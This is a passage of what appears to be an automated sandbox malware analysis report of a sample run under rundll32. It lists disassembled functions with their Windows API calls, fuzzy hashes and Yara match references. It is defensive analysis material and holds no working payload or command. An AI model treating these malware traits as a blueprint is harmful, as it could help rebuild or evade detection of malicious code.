                              • API String ID: 653387826-0
                              • Opcode ID: 80b0987db2831fbd6bac22b8f033cefe0ae6c8c2ea02cf260a1b125478ab328f
                              • Instruction ID: ca7039107d6a1b53d21dbd3f0e2bc05beafaa433012e4ba9dbf21b54ce4ab604
                              • Opcode Fuzzy Hash: 80b0987db2831fbd6bac22b8f033cefe0ae6c8c2ea02cf260a1b125478ab328f
                              • Instruction Fuzzy Hash: C6018B75204704AFD721DF64CC05E6ABBB9FF84220B228529FA4693750DB70ED15DFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05940818 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05942397,?), ref: 05940820
                              • GetVersion.KERNEL32 ref: 0594082F
                              • GetCurrentProcessId.KERNEL32 ref: 0594084B
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05940868
                              • GetLastError.KERNEL32 ref: 05940887
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: 8b8977c7edfa5cdec39487e907881cdaaac151e7e30ce104bf279e0f4bf77026
                              • Instruction ID: 3bc7e85b920ca64387deb683be822c100d9d7fef02428618db5bc6085a18df06
                              • Opcode Fuzzy Hash: 8b8977c7edfa5cdec39487e907881cdaaac151e7e30ce104bf279e0f4bf77026
                              • Instruction Fuzzy Hash: 04F069706683019FE6248B30AA0BF25BF65BB04702F500615F70ACA2C0EF759460CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059389EE Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 059389FB
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05938A0B
                              • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05938A14
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05942F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05938A32
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05942F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05938A3F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                              • String ID:
                              • API String ID: 3667519916-0
                              • Opcode ID: 0b23ad3987f54bdb83f8ea66a06804088bf1b0a306fc24e89889e14af1aa02e8
                              • Instruction ID: 06d9ce0a919e0a2c62ee7cea7294c8cef377513cb8a94cd52f9367d40f42cbd0
                              • Opcode Fuzzy Hash: 0b23ad3987f54bdb83f8ea66a06804088bf1b0a306fc24e89889e14af1aa02e8
                              • Instruction Fuzzy Hash: 62F03A32209700EFDB206A75DC49F1BBAACBF44651F114624F546D2590CB24EC15CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C484 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0594C4A8
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • wsprintfA.USER32 ref: 0594C4D9
                                • Part of subcall function 0593AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0593A1A1), ref: 0593AAC5
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AAED
                                • Part of subcall function 0593AAAF: lstrlen.KERNEL32(?), ref: 0593AAFC
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AB3C
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AB71
                                • Part of subcall function 0593AAAF: memcpy.NTDLL(00000000,?,?), ref: 0593AB7E
                                • Part of subcall function 0593AAAF: memcpy.NTDLL(00000008,059553E8,00000002,00000000,?,?), ref: 0593AB93
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593ABB6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0594C54E
                                • Part of subcall function 05952968: RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0595297E
                                • Part of subcall function 05952968: RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05952999
                              • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0594C538
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0594C544
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                              • String ID:
                              • API String ID: 3553201432-0
                              • Opcode ID: 71f8417467193469d6a576296c21f7ddae0bdb3df2dea4056e7a57325b775a98
                              • Instruction ID: 511a1ab6aed2d5526752d429a7f1c784c7f2dc573a04789055dc17cdb791e3e8
                              • Opcode Fuzzy Hash: 71f8417467193469d6a576296c21f7ddae0bdb3df2dea4056e7a57325b775a98
                              • Instruction Fuzzy Hash: DB212672914249EFCF11DFA9DD89D9FBFBAFB88310B004426F905A6110D7719A24DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593EF5F Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                              Download Yara Rule
                              APIs
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFBC
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFCD
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFE5
                              • CloseHandle.KERNEL32(?), ref: 0593EFFF
                              • HeapFree.KERNEL32(00000000,?), ref: 0593F014
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap$CloseHandle
                              • String ID:
                              • API String ID: 1910495013-0
                              • Opcode ID: c4258cc831cf2c01bd81b2f2f656fff2263c704d99a9dacd39f5f6eca684a406
                              • Instruction ID: 5285666f3cff36aefefdf829c6a0656e47d2ea2a514d83338194887359830613
                              • Opcode Fuzzy Hash: c4258cc831cf2c01bd81b2f2f656fff2263c704d99a9dacd39f5f6eca684a406
                              • Instruction Fuzzy Hash: 2A21F571619621EFC3219B65DC89C2AFBAEFF49B113540514F40AD3650C731ECA1DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059496EE Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0593EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0593EC1B
                                • Part of subcall function 0593EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593EC69
                                • Part of subcall function 0593EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0593EC82
                                • Part of subcall function 0593EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0593ECD3
                              • GetLastError.KERNEL32(?,?,00000001), ref: 0594987C
                              • FreeLibrary.KERNEL32(?,?,00000001), ref: 059498E4
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                              • String ID:
                              • API String ID: 1730969706-0
                              • Opcode ID: 066736a1f7f3a64cf8cc02e565e788b555526f8d24bb5422cb22c9664ff5f590
                              • Instruction ID: c76f0956af95ded1c54c4799a529bbbf166771e721440b6eabe1ac27f8698ede
                              • Opcode Fuzzy Hash: 066736a1f7f3a64cf8cc02e565e788b555526f8d24bb5422cb22c9664ff5f590
                              • Instruction Fuzzy Hash: FF71B2B5E00209EFCF10DFE9C888DAEBBB9BF48314B1485A9E516A7251D735AD41CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05952E7D Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?), ref: 05952E89
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • ResetEvent.KERNEL32(?,?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6), ref: 05952F00
                              • GetLastError.KERNEL32(?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952F2D
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • GetLastError.KERNEL32(?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952FEF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                              • String ID:
                              • API String ID: 943265810-0
                              • Opcode ID: a90f6aa440133ae7b2c94dd01e8e2466154c3806c6fcc2057ce025621aa2d70a
                              • Instruction ID: e5f61c8ba3c7b15985aa0b3d29f23590241ec0cf74f92489f24010802f8c23f3
                              • Opcode Fuzzy Hash: a90f6aa440133ae7b2c94dd01e8e2466154c3806c6fcc2057ce025621aa2d70a
                              • Instruction Fuzzy Hash: A64160B6604304BFEB219FA0DC89EBB7BADFB44714F044939F902D6190EB709964DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944DA9 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05944E5C
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 05944E72
                              • memset.NTDLL ref: 05944F1B
                              • memset.NTDLL ref: 05944F31
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 1b7e23a9f15f9a6444f891b6d52947f971d0eb2120b8df05a5ccda525e6630e0
                              • Instruction ID: 3ac2d42bcd5d79bbc0404f7ebd19a4ed6c396bba78df998c39015d1a41e80d38
                              • Opcode Fuzzy Hash: 1b7e23a9f15f9a6444f891b6d52947f971d0eb2120b8df05a5ccda525e6630e0
                              • Instruction Fuzzy Hash: 40418A31B00219AFDF10DF68DC85FEE77A9EB85710F108569E81AA7280DB70AE558F91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593F5ED Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              APIs
                              • ResetEvent.KERNEL32(?,00000000,00000000,00000000,05933EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594C7D5
                              • GetLastError.KERNEL32(?,?,?,05933EC6,?,?), ref: 0594C7EE
                              • ResetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594C867
                              • GetLastError.KERNEL32(?,?,?,05933EC6,?,?), ref: 0594C882
                                • Part of subcall function 0594EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                                • Part of subcall function 0594EC09: SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$ErrorLastReset$ObjectSingleWait
                              • String ID:
                              • API String ID: 1123145548-0
                              • Opcode ID: 5fa4864f2d2b0a1c31233340ca5b72f26cf38bc1ab777e17b2fbd8fe5abb21b7
                              • Instruction ID: 69a4f22adb33ccedeb3bc5622de6e5f88916b7d47cc480c18428de4643c852b1
                              • Opcode Fuzzy Hash: 5fa4864f2d2b0a1c31233340ca5b72f26cf38bc1ab777e17b2fbd8fe5abb21b7
                              • Instruction Fuzzy Hash: 8741A232A00204EFDB219BA4CC44EAEB7BABF88360F150565F516D7290EB74ED41DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05949A79 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 05949A93
                              • StrChrA.SHLWAPI(?,0000005C), ref: 05949ABA
                              • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 05949AE0
                              • lstrcpy.KERNEL32(?,?), ref: 05949B84
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrcpyn
                              • String ID:
                              • API String ID: 4154805583-0
                              • Opcode ID: 22d374f893e70eb0fa473d7e1e30a30d99d089a13bcaf4cbd577384248e2e25e
                              • Instruction ID: e3aba28289229c3b7f9681e359ec3fc1b76adbf02d291cf2ca825cdf1dd480e6
                              • Opcode Fuzzy Hash: 22d374f893e70eb0fa473d7e1e30a30d99d089a13bcaf4cbd577384248e2e25e
                              • Instruction Fuzzy Hash: CE412976904219BFEB11DBA4CC88DEFBBBCAF49250F0445A6F905E7141DA349E58CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05949185 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: _strupr
                              • String ID:
                              • API String ID: 3408778250-0
                              • Opcode ID: 1296071d3fb27551d713eb8a04562c1f7f8abefc86680e28b11ad92d27591936
                              • Instruction ID: 4313a64806861b110be1d2958f59645f4b1de7285a9cd3438f35ade457b9dc08
                              • Opcode Fuzzy Hash: 1296071d3fb27551d713eb8a04562c1f7f8abefc86680e28b11ad92d27591936
                              • Instruction Fuzzy Hash: CD41EB729042099BEF21DF78D88CEEFB7ADBF45250F208426EC25D6160D778E965CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05934858 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 05939D54
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059348C0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05934911
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05934946
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05934956
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: f96dda902787bdba5e0ab832b5ff190b497fdf2fcf616355e85fe3f78fdce2fd
                              • Instruction ID: 50183841977f84b36fc78653d30728d9ff1d4ef7f9d23a005b4f461446dd144c
                              • Opcode Fuzzy Hash: f96dda902787bdba5e0ab832b5ff190b497fdf2fcf616355e85fe3f78fdce2fd
                              • Instruction Fuzzy Hash: 37312876510119FFDB009FA4CC8ACAEBFBDFB09250B110065F605D3210EB71AE649BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594EC09 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                              • SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              • GetLastError.KERNEL32 ref: 0594ECB9
                                • Part of subcall function 0594F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05952F4B,0000EA60,?,?,?,0594DD27,00000000,0000EA60,00000000), ref: 0594F1B2
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • GetLastError.KERNEL32(00000000), ref: 0594ECEE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                              • String ID:
                              • API String ID: 602384898-0
                              • Opcode ID: e050268ecd2fbc224c26e2dfa18a92b15e31ae01958be9d2e0ed84581806a289
                              • Instruction ID: 34e0e1452fe21b98a54d3391d918d0866cc2f6cdffe01bc419d7efc6c338b315
                              • Opcode Fuzzy Hash: e050268ecd2fbc224c26e2dfa18a92b15e31ae01958be9d2e0ed84581806a289
                              • Instruction Fuzzy Hash: 3831FCB5904309EFDB20DFA5C884DAEBBBCFF08209F14496AE502A2241D771AE44DF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594A868 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0594A8C1
                              • memcpy.NTDLL(00000018,?,?), ref: 0594A8EA
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0594A929
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594A93C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 6e53c6c5f608e3ebf70a0e8f954e6951ddff78c655d4ab776b7d51a9ee02d5a9
                              • Instruction ID: 95df3314035609a3195fee6e69b6c9671f0074befc7744d4ac3e785c35eb26a5
                              • Opcode Fuzzy Hash: 6e53c6c5f608e3ebf70a0e8f954e6951ddff78c655d4ab776b7d51a9ee02d5a9
                              • Instruction Fuzzy Hash: 45314B70245305AFDB208F24DC45E9EBBA9FF09321F014129F95AD62A0DB70ED25DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944B99 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 05944BC8
                              • SetEvent.KERNEL32(?), ref: 05944C12
                              • TlsSetValue.KERNEL32(00000001), ref: 05944C4C
                              • TlsSetValue.KERNEL32(00000000), ref: 05944C68
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: b053460e46b19cce7e4e3e0060dbfe2fa96590307a1481d4ecd7cacac417c491
                              • Instruction ID: ec70ecfd7e94ae8bdbc37a605df3fc49c2df84af1b839ff95bab107c385650bb
                              • Opcode Fuzzy Hash: b053460e46b19cce7e4e3e0060dbfe2fa96590307a1481d4ecd7cacac417c491
                              • Instruction Fuzzy Hash: 7621D131204304AFCF219F64CD86EAABBBAFF80752B584529F50ACA160C731EC61DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594F09D Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,05933EC6), ref: 05945540
                                • Part of subcall function 0594550A: memset.NTDLL ref: 059455B6
                                • Part of subcall function 0594550A: memset.NTDLL ref: 059455CA
                              • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0594F0F5
                              • lstrcmpi.KERNEL32(00000000,?), ref: 0594F11C
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0594F161
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0594F172
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                              • String ID:
                              • API String ID: 1065503980-0
                              • Opcode ID: 4ee587ce2c2be98a38c65645b33fd164ffe638c43101dcf1eac1113d07b08863
                              • Instruction ID: 12914e5c5897080251c319493f1e6fc41c8e53b76b97f4ebfb0189ce8806db82
                              • Opcode Fuzzy Hash: 4ee587ce2c2be98a38c65645b33fd164ffe638c43101dcf1eac1113d07b08863
                              • Instruction Fuzzy Hash: 3D213931A10209FFDF119FA4DD49EAEBFB9EB48355F104420F909E6210DB30AD689F50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E0C4 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594E0F3
                              • lstrlen.KERNEL32(00000000), ref: 0594E104
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • strcpy.NTDLL ref: 0594E11B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0594E125
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 54fb393e614e168901faa5c6b91138e126973437a0d1d7b0731bb7464ace15dc
                              • Instruction ID: 3dac1dbac2e8d90bb55eb238b6cb27c858cbbbe93fa8532026e23c759ffbe0b6
                              • Opcode Fuzzy Hash: 54fb393e614e168901faa5c6b91138e126973437a0d1d7b0731bb7464ace15dc
                              • Instruction Fuzzy Hash: D6218076148305AFEB219B64D94AF2AB7EDFF48711F008419F9968B281EF75D814CB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05932F91 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 05932FB3
                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05932FF7
                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0593303A
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0593305D
                                • Part of subcall function 0594B9E9: GetTickCount.KERNEL32 ref: 0594B9F9
                                • Part of subcall function 0594B9E9: CreateFileW.KERNEL32(05940971,80000000,00000003,0595A1E8,00000003,00000000,00000000,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA16
                                • Part of subcall function 0594B9E9: GetFileSize.KERNEL32(05940971,00000000,?,00000001,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA49
                                • Part of subcall function 0594B9E9: CreateFileMappingA.KERNEL32(05940971,0595A1E8,00000002,00000000,00000000,05940971), ref: 0594BA5D
                                • Part of subcall function 0594B9E9: lstrlen.KERNEL32(05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA79
                                • Part of subcall function 0594B9E9: lstrcpy.KERNEL32(?,05940971), ref: 0594BA89
                                • Part of subcall function 0594B9E9: HeapFree.KERNEL32(00000000,05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BAA4
                                • Part of subcall function 0594B9E9: CloseHandle.KERNEL32(05940971,?,00000001,?,05940971), ref: 0594BAB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: ef71f9532d7ccf6ff9b81665593228f3bf5a7ae8256c814d1c97fef70d356477
                              • Instruction ID: 4791a8e57f7f284cb07869b22c361ec077dcd5ddbb27c52398207e9c68be3916
                              • Opcode Fuzzy Hash: ef71f9532d7ccf6ff9b81665593228f3bf5a7ae8256c814d1c97fef70d356477
                              • Instruction Fuzzy Hash: 68217A31544208DAEF20DF66DD49EEEBBB9FF84354F140525F929921A0D7309949CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05952968 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0595297E
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05952999
                              • GetLastError.KERNEL32 ref: 05952A07
                              • GetLastError.KERNEL32 ref: 05952A16
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalErrorLastSection$EnterLeave
                              • String ID:
                              • API String ID: 2124651672-0
                              • Opcode ID: 40a182fdeebea968d5595c84fe55ff6c726c40b9da91fc56a1c793cc865769ad
                              • Instruction ID: ad45619ba40f2deee9d1243dcf2ae54cc7e1d3d7edd3362772adf40579e8debd
                              • Opcode Fuzzy Hash: 40a182fdeebea968d5595c84fe55ff6c726c40b9da91fc56a1c793cc865769ad
                              • Instruction Fuzzy Hash: A5216D36504208EFCF22CFA4D905A9EBBB8FF48725F114159FD06A3250CB35D921DB94
